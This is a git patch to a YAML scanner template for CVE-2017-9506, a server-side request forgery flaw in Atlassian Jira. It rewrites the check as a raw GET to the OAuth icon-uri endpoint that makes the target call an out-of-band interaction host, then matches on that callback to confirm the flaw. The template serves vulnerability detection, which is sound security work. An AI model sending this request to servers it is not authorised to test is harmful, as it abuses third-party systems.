From de4f25fce739da2e37b04d3f0a491a9e2bfef250 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 18 Apr 2021 22:06:07 +0530
Subject: [PATCH] OOB Template updates (WIP)

---
 cves/2017/CVE-2017-9506.yaml | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml
index 5f3d9fd808..1a5536f11d 100644
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@@ -1,3 +1,4 @@
+
 id: CVE-2017-9506
 
 info:
@@ -12,11 +13,18 @@ info:
   tags: cve,cve2017,atlassian,jira,ssrf
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
+  - raw:
+      - |
+        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
     matchers:
       - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "ipinfo.io/missingauth"
-        part: body
+          - "http"
\ No newline at end of file